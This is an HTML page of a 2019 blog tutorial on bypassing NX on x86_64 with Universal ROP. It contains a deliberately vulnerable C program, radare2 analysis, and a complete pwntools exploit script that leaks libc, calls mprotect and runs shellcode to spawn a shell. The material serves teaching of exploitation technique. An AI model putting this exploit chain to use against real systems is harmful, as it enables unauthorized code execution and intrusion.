<!DOCTYPE html>
<html lang="en-us">
    <head>
        

        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Shellcode Injection - Old but gold</title>
        
        <style>

    html body {
        font-family: 'Roboto Mono', sans-serif;
        background-color: white;
    }

    :root {
        --accent: #00a6d8;
        --border-width:  5px ;
    }

</style>


<link rel="stylesheet" href="https://raffaeleflorio.github.io/css/main.css">





<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto%20Mono">


 <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/solarized-dark.min.css"> 


<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">


<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">
 

    <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js"></script>
    
        <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/languages/shell.min.js"></script>
    
        <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/languages/bash.min.js"></script>
    
        <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/languages/c.min.js"></script>
    
        <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/languages/python.min.js"></script>
    
        <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/languages/java.min.js"></script>
    
        <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/languages/javascript.min.js"></script>
    
    <script>hljs.initHighlightingOnLoad();</script>






<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>


<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>


<script>$(document).on('click', function() { $('.collapse').collapse('hide'); })</script>
 <meta name="generator" content="Hugo 0.72.0" />
        

        

        
            <script type="text/javascript" async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
        

        

    </head>

    <body>
        

        <nav class="navbar navbar-default navbar-fixed-top">
            <div class="container">
                <div class="navbar-header">
                    <a class="navbar-brand visible-xs" href="#">Shellcode Injection - Old but gold</a>
                    <button class="navbar-toggle" data-target=".navbar-collapse" data-toggle="collapse">
                        <span class="icon-bar"></span>
                        <span class="icon-bar"></span>
                        <span class="icon-bar"></span>
                    </button>
                </div>
                <div class="collapse navbar-collapse">
                    
                        <ul class="nav navbar-nav">
                            
                                <li><a href="/">Home</a></li>
                            
                                <li><a href="/post/">Posts</a></li>
                            
                                <li><a href="/project/">Projects</a></li>
                            
                                <li><a href="/tags/">Tags</a></li>
                            
                                <li><a href="/friends/">Friends</a></li>
                            
                        </ul>
                    
                    
                        <ul class="nav navbar-nav navbar-right">
                            
                                <li class="navbar-icon"><a href="https://github.com/raffaeleflorio/"><i class="fa fa-github"></i></a></li>
                            
                                <li class="navbar-icon"><a href="https://www.linkedin.com/in/raffaele-florio-79967919b/"><i class="fa fa-linkedin"></i></a></li>
                            
                                <li class="navbar-icon"><a href="https://instagram.com/r7florio/"><i class="fa fa-instagram"></i></a></li>
                            
                                <li class="navbar-icon"><a href="/key.asc"><i class="fa fa-key"></i></a></li>
                            
                                <li class="navbar-icon"><a href="mailto:raffaeleflorio@protonmail.com"><i class="fa fa-envelope-o"></i></a></li>
                            
                        </ul>
                    
                </div>
            </div>
        </nav>


<main>

    <div>
        <h2>Shellcode Injection - Old but gold</h2>
        <h5>October 13, 2019</h5>
        
<a href="https://raffaeleflorio.github.io/tags/pwn"><kbd class="item-tag">pwn</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/x86"><kbd class="item-tag">x86</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/shellcode"><kbd class="item-tag">shellcode</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/tutorial"><kbd class="item-tag">tutorial</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/universal-rop"><kbd class="item-tag">universal rop</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/urop"><kbd class="item-tag">urop</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/rop"><kbd class="item-tag">rop</kbd></a>


    </div>

    <div align="left" class="content"><h1 id="intro">Intro</h1>
<p>Some time ago, a friend of mine (<a href="https://dag-tech.github.io">dag-tech</a>), asked me about a technique to run a shellcode with <code>NX</code> enabled. So he gave me a simple program:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c"><span style="color:#75715e">//src.c
</span><span style="color:#75715e"></span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdio.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;unistd.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e"></span>
<span style="color:#66d9ef">int</span> <span style="color:#a6e22e">main</span>(<span style="color:#66d9ef">int</span> argc, <span style="color:#66d9ef">char</span> <span style="color:#f92672">**</span>argv) {
	<span style="color:#66d9ef">char</span> buf[<span style="color:#ae81ff">16</span>];
	puts(<span style="color:#e6db74">&#34;Can you pwn me????&#34;</span>);
	read(<span style="color:#ae81ff">0</span>, buf, <span style="color:#ae81ff">512</span>);
	<span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>;
}
</code></pre></div><div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">$ gcc -z noexecstack -fno-stack-protector -o vuln src.c
$ checksec vuln
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE <span style="color:#f92672">(</span>0x400000<span style="color:#f92672">)</span>
</code></pre></div><h1 id="the-approach">The approach</h1>
<p>The issue with <code>NX</code> is that we cannot execute code in writable memory segment. So we should find a way to disable, at run-time, this protection.</p>
<p>Fortunately the <code>mprotect</code> function, in <code>libc</code>, just do this:</p>
<pre><code>NAME
       mprotect — set protection of memory mapping

SYNOPSIS
       #include &lt;sys/mman.h&gt;

       int mprotect(void *addr, size_t len, int prot);

DESCRIPTION
       The mprotect() function shall change the access protections to be that specified by prot for those whole pages containing any part of the address space of the  process  starting  at
       address  addr  and  continuing for len bytes. The parameter prot determines whether read, write, execute, or some combination of accesses are permitted to the data being mapped. The
       prot argument should be either PROT_NONE or the bitwise-inclusive OR of one or more of PROT_READ, PROT_WRITE, and PROT_EXEC.

</code></pre><p>So here the exploit plan:</p>
<ul>
<li>Leak a function address in libc. In this way we can call mprotect</li>
<li>Find a memory segment where we could write the shellcode</li>
<li>Call mprotect to disable NX on that region</li>
<li>Jump to that region</li>
<li>Profit</li>
</ul>
<p>We leak the puts address and we write the shellcode starting from the <code>.got.plt</code> segment address.</p>
<h1 id="exploitation">Exploitation</h1>
<p>To build the ROP chain we use a <em>general techinique</em>, usable on any glibc x86_64 binary, called <code>Universal ROP</code>.</p>
<p>Basically we use the gadgets in the <code>__libc_csu_init</code> function, included by glibc in any x86_64 binary, to populate rdi, rsi and rdx.</p>
<p>These are, in fact, the first three registers used to pass argument to a function in x86_64 convention.</p>
<p>So we can call any function that accept <em>up</em> to three arguments, like <code>mprotect</code>.</p>
<p>Here the interesting part (so the gadgets..) of <code>__libc_csu_init</code> function:</p>
<pre><code>0x004011b0      4c89f2         mov rdx, r14
0x004011b3      4c89ee         mov rsi, r13
0x004011b6      4489e7         mov edi, r12d
0x004011b9      41ff14df       call qword [r15 + rbx*8]
0x004011bd      4883c301       add rbx, 1
0x004011c1      4839dd         cmp rbp, rbx
0x004011c4      75ea           jne 0x4011b0
0x004011c6      4883c408       add rsp, 8
0x004011ca      5b             pop rbx
0x004011cb      5d             pop rbp
0x004011cc      415c           pop r12
0x004011ce      415d           pop r13
0x004011d0      415e           pop r14
0x004011d2      415f           pop r15
						0x004011d3	5f	pop rdi
0x004011d4      c3             ret		0x004011d4	c3	ret
</code></pre><p><em>Note that there could be differences between glibc version. Currently I’m using the <code>libc-2.29</code>. However the approach is the same.</em></p>
<p>We can easily identify:</p>
<ul>
<li><code>pop rdi</code> to set rdi, at <code>0x004011d3</code>.</li>
<li><code>pop r13</code> and <code>mov rsi, r13</code> to set <code>rsi</code>. At <code>0x004011ce</code> and <code>0x004011b3</code>.</li>
<li><code>pop r14</code> and <code>mov rdx, r14</code> to set <code>rdx</code>. At <code>0x004011d0</code> and <code>0x004011b0</code>.</li>
</ul>
<p>However there are two issues to overwhelm before we can set <code>rsi</code> and <code>rdx</code>. In fact after the <code>mov</code> there are:</p>
<ul>
<li>The <code>call qword [r15 + rbx*8]</code> at <code>0x004011b9</code></li>
<li>The <code>jne 0x4011b0</code> at <code>0x004011c4</code>.</li>
</ul>
<p>The latter should fail and this is is easily achievable because we control both <code>rbx</code> and <code>rbp</code> (thanks the pops at the bottom of the function). So we set <code>rbx</code> to 0 and <code>rbp</code> to 1.</p>
<p>The former requires a bit of work.. In fact <code>r15 + rbx*8</code> should point to an instruction in a executable segment and it should not interfer with our exploit&hellip;
However because <code>rbx</code> is equal to 0 the condition is reduced only to <code>r15</code>. And we control it thanks the <code>pop r15</code> at the bottom of the function.</p>
<p>Nonetheless.. What value <code>r15</code> should contain? A pointer to a function is an ideal candidate…</p>
<p><strong>BINGO!</strong></p>
<p>In every <code>ELF</code> executable there is a <code>.fini_array</code> section, that is an array of <em>pointer to functions</em>. These functions should be called when the program exit.</p>
<p>Let’s analyze this section with <code>r2</code>.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">$ r2 -Ad vuln
<span style="color:#f92672">[</span>r2<span style="color:#f92672">]</span>&gt; iS
...

<span style="color:#ae81ff">19</span> 0x00002e18     <span style="color:#ae81ff">8</span> 0x00403e18     <span style="color:#ae81ff">8</span> -rw- .fini_array
...

<span style="color:#f92672">[</span>r2<span style="color:#f92672">]</span>&gt; pxr <span style="color:#ae81ff">8</span> @0x00403e18
0x00403e18 0x0000000000401100   ..@..... @loc.__init_array_end <span style="color:#ae81ff">0</span>
<span style="color:#f92672">[</span>r2<span style="color:#f92672">]</span>&gt; pdf @0x0000000000401100
    0x00401100      f30f1efa       endbr64
    0x00401104      803d212f0000.  cmp byte <span style="color:#f92672">[</span>obj.completed.7387<span style="color:#f92672">]</span>, <span style="color:#ae81ff">0</span>
,<span style="color:#f92672">=</span>&lt; 0x0040110b      <span style="color:#ae81ff">7513</span>           jne 0x401120
|   ...
|   ...
|  0x00401116      c6050f2f0000.  mov byte <span style="color:#f92672">[</span>obj.completed.7387<span style="color:#f92672">]</span>, <span style="color:#ae81ff">1</span>
|  0x0040111d      5d             pop rbp
<span style="color:#e6db74">`</span>-&gt;0x00401120      c3             ret
</code></pre></div><p>So if <code>[obj.completed.7387]</code> is different than 0 this function acts like a <code>NOP</code>. And at <code>0x00401116</code> <code>[obj.completed.7387]</code> is set to 1…</p>
<p><strong>PERFECT! :D</strong></p>
<p>We have all elements in place.</p>
<p>So to recap: <code>r15</code> should contain the <code>.fini_array</code> address but before the first element of the <code>ROP chain</code> we should call <code>0x00401116</code> to set <code>obj.completed.7387</code> to 1.
In this way the call acts like a <code>NOP</code>.</p>
<p>So here the exploit:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#75715e">#!/usr/bin/python2</span>

<span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>

prog <span style="color:#f92672">=</span> context<span style="color:#f92672">.</span>binary <span style="color:#f92672">=</span> ELF(os<span style="color:#f92672">.</span>getcwd() <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;/vuln&#34;</span>, checksec<span style="color:#f92672">=</span>False)

<span style="color:#66d9ef">if</span> len(sys<span style="color:#f92672">.</span>argv) <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">1</span>:
	host <span style="color:#f92672">=</span> sys<span style="color:#f92672">.</span>argv[<span style="color:#ae81ff">1</span>]
	port <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>
	t <span style="color:#f92672">=</span> remote(host, port)
<span style="color:#66d9ef">else</span>:
	t <span style="color:#f92672">=</span> prog<span style="color:#f92672">.</span>process()
	mprotect_offset <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span> <span style="color:#75715e"># this is libc dependent</span>

offset <span style="color:#f92672">=</span> <span style="color:#ae81ff">24</span>
header <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;A&#34;</span><span style="color:#f92672">*</span>offset
shellcode <span style="color:#f92672">=</span> asm(shellcraft<span style="color:#f92672">.</span>sh())
gotplt  <span style="color:#f92672">=</span> prog<span style="color:#f92672">.</span>get_section_by_name(<span style="color:#e6db74">&#34;.got.plt&#34;</span>)<span style="color:#f92672">.</span>header<span style="color:#f92672">.</span>sh_addr
fini_array <span style="color:#f92672">=</span> prog<span style="color:#f92672">.</span>get_section_by_name(<span style="color:#e6db74">&#34;.fini_array&#34;</span>)<span style="color:#f92672">.</span>header<span style="color:#f92672">.</span>sh_addr
read <span style="color:#f92672">=</span> prog<span style="color:#f92672">.</span>plt[<span style="color:#e6db74">&#34;read&#34;</span>]
puts <span style="color:#f92672">=</span> prog<span style="color:#f92672">.</span>plt[<span style="color:#e6db74">&#34;puts&#34;</span>]
main <span style="color:#f92672">=</span> prog<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;main&#34;</span>]

prdi     <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x004011d3</span> <span style="color:#75715e"># pop rdi</span>

brdx     <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x004011ca</span> <span style="color:#75715e"># pop rbx</span>
                      <span style="color:#75715e"># pop rbp</span>
                      <span style="color:#75715e"># pop r12</span>
                      <span style="color:#75715e"># pop r13</span>
                      <span style="color:#75715e"># `pr14 stuff`</span>

pr14     <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x004011d0</span> <span style="color:#75715e"># pop r14</span>
                      <span style="color:#75715e"># pop r15</span>

mr14trdx <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x004011b0</span> <span style="color:#75715e"># mov rdx, r14</span>
                      <span style="color:#75715e"># mov rsi, r13</span>
                      <span style="color:#75715e"># mov edi, r12d</span>
                      <span style="color:#75715e"># call qword [r15 + rbx*8]</span>
                      <span style="color:#75715e"># add rbx, 1</span>
                      <span style="color:#75715e"># cmp rbp, rbx</span>
                      <span style="color:#75715e"># jne 0x4011b0 -&gt; SHOULD FAIL</span>
                      <span style="color:#75715e"># add rsp, 8</span>
                      <span style="color:#75715e"># `brdx stuff`</span>

completedToOne <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x00401116</span> <span style="color:#75715e"># mov byte [obj.completed], 1</span>
                            <span style="color:#75715e"># pop rbp</span>

<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">init_urop</span>():
	payload <span style="color:#f92672">=</span> p64(completedToOne)
	payload <span style="color:#f92672">+=</span> <span style="color:#e6db74">&#34;J&#34;</span><span style="color:#f92672">*</span><span style="color:#ae81ff">8</span>
	<span style="color:#66d9ef">return</span> payload

<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">urop</span>(fn, rdi, rsi<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>, rdx<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>):
	payload <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>
	<span style="color:#75715e"># set rsi and rdx</span>
	payload <span style="color:#f92672">+=</span> p64(brdx)
	payload <span style="color:#f92672">+=</span> p64(<span style="color:#ae81ff">0</span>)   <span style="color:#75715e">#rbx</span>
	payload <span style="color:#f92672">+=</span> p64(<span style="color:#ae81ff">1</span>)   <span style="color:#75715e">#rbp</span>
	payload <span style="color:#f92672">+=</span> <span style="color:#e6db74">&#34;J&#34;</span><span style="color:#f92672">*</span><span style="color:#ae81ff">8</span>    <span style="color:#75715e">#r12</span>
	payload <span style="color:#f92672">+=</span> p64(rsi) <span style="color:#75715e">#r13</span>
	payload <span style="color:#f92672">+=</span> p64(rdx) <span style="color:#75715e">#r14</span>
	payload <span style="color:#f92672">+=</span> p64(fini_array) <span style="color:#75715e">#r15</span>
	payload <span style="color:#f92672">+=</span> p64(mr14trdx)
	payload <span style="color:#f92672">+=</span> <span style="color:#e6db74">&#34;J&#34;</span><span style="color:#f92672">*</span><span style="color:#ae81ff">56</span>
	<span style="color:#75715e"># set rdi</span>
	payload <span style="color:#f92672">+=</span> p64(prdi)
	payload <span style="color:#f92672">+=</span> p64(rdi)
	<span style="color:#75715e"># fn</span>
	payload <span style="color:#f92672">+=</span> p64(fn)
	<span style="color:#66d9ef">return</span> payload

<span style="color:#75715e"># stage1: leak puts@libc, so get mprotect@libc.</span>

payload <span style="color:#f92672">=</span> header
payload <span style="color:#f92672">+=</span> init_urop()
payload <span style="color:#f92672">+=</span> urop(puts, prog<span style="color:#f92672">.</span>got[<span style="color:#e6db74">&#34;puts&#34;</span>])
payload <span style="color:#f92672">+=</span> p64(main)

t<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">&#34;Can you pwn me????</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>)
t<span style="color:#f92672">.</span>sendline(payload)

puts_libc <span style="color:#f92672">=</span> u64(t<span style="color:#f92672">.</span>recvline()<span style="color:#f92672">.</span>replace(<span style="color:#e6db74">&#39;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#39;</span>, <span style="color:#e6db74">&#39;&#39;</span>)<span style="color:#f92672">.</span>ljust(<span style="color:#ae81ff">8</span>, <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x00</span><span style="color:#e6db74">&#34;</span>))
mprotect_libc <span style="color:#f92672">=</span> puts_libc <span style="color:#f92672">-</span> mprotect_offset
log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">&#34;puts@libc: {:#x}&#34;</span><span style="color:#f92672">.</span>format(puts_libc))
log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">&#34;mprotect@libc: {:#x}&#34;</span><span style="color:#f92672">.</span>format(mprotect_libc))

<span style="color:#75715e"># stage2: read(0, gotplt, len(shellcode))</span>
<span style="color:#75715e">#         mprotect(gotplt, len(shellcode), PROT_READ | PROT_WRITE | PROT_EXEC)</span>
<span style="color:#75715e">#         jmp to the shellcode</span>
payload <span style="color:#f92672">=</span> header
payload <span style="color:#f92672">+=</span> urop(read, <span style="color:#ae81ff">0</span>, gotplt, len(shellcode))
payload <span style="color:#f92672">+=</span> urop(mprotect_libc, gotplt, len(shellcode), <span style="color:#ae81ff">7</span>)
payload <span style="color:#f92672">+=</span> p64(gotplt)

t<span style="color:#f92672">.</span>sendline(payload)
t<span style="color:#f92672">.</span>sendline(shellcode)
log<span style="color:#f92672">.</span>success(<span style="color:#e6db74">&#34;DONE&#34;</span>)

t<span style="color:#f92672">.</span>recvrepeat(<span style="color:#ae81ff">0.3</span>)
t<span style="color:#f92672">.</span>interactive()
t<span style="color:#f92672">.</span>close()
</code></pre></div><div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">$ ./exploit.py
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Starting local process <span style="color:#e6db74">&#39;/path/to/vuln&#39;</span>
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> puts@libc: puts_address
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> mprotect@libc: mprotect_address
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> DONE
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Switching to interactive mode
$ echo hi :<span style="color:#f92672">)</span>
hi :<span style="color:#f92672">)</span>
$
</code></pre></div><h2 id="references">References</h2>
<ul>
<li><a href="https://www.slideshare.net/inaz2/rop-illmatic-exploring-universal-rop-on-glibc-x8664-en-41595384">Universal ROP</a></li>
</ul>
</div>

    
    
    
        <h4 class="page-header">Related</h4>
         <div class="item">

    
    
    

    
    

    <h4><a href="/post/remote-school-auctf2020/">AUCTF 2020 Writeup - Remote School</a></h4>
    <h5>April 20, 2020</h5>
    
<a href="https://raffaeleflorio.github.io/tags/ctf"><kbd class="item-tag">ctf</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/writeup"><kbd class="item-tag">writeup</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/pwn"><kbd class="item-tag">pwn</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/x86"><kbd class="item-tag">x86</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/auctf2020"><kbd class="item-tag">auctf2020</kbd></a>



</div>
  <div class="item">

    
    
    

    
    

    <h4><a href="/post/thanksgiving-dinner-auctf2020/">AUCTF 2020 Writeup - Thanksgiving Dinner</a></h4>
    <h5>April 19, 2020</h5>
    
<a href="https://raffaeleflorio.github.io/tags/ctf"><kbd class="item-tag">ctf</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/writeup"><kbd class="item-tag">writeup</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/pwn"><kbd class="item-tag">pwn</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/x86"><kbd class="item-tag">x86</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/auctf2020"><kbd class="item-tag">auctf2020</kbd></a>



</div>
  <div class="item">

    
    
    

    
    

    <h4><a href="/post/house-of-madness-auctf2020/">AUCTF 2020 Writeup - House of Madness</a></h4>
    <h5>April 19, 2020</h5>
    
<a href="https://raffaeleflorio.github.io/tags/ctf"><kbd class="item-tag">ctf</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/writeup"><kbd class="item-tag">writeup</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/pwn"><kbd class="item-tag">pwn</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/x86"><kbd class="item-tag">x86</kbd></a>

<a href="https://raffaeleflorio.github.io/tags/auctf2020"><kbd class="item-tag">auctf2020</kbd></a>



</div>
 
    

    
    

</main>

        <footer>
            <p class="copyright text-muted">© All rights reserved. Powered by <a href="https://gohugo.io">Hugo</a> and <a href="https://github.com/calintat/minimal">Minimal</a>.</p>
        </footer>

        

        
    </body>

</html>

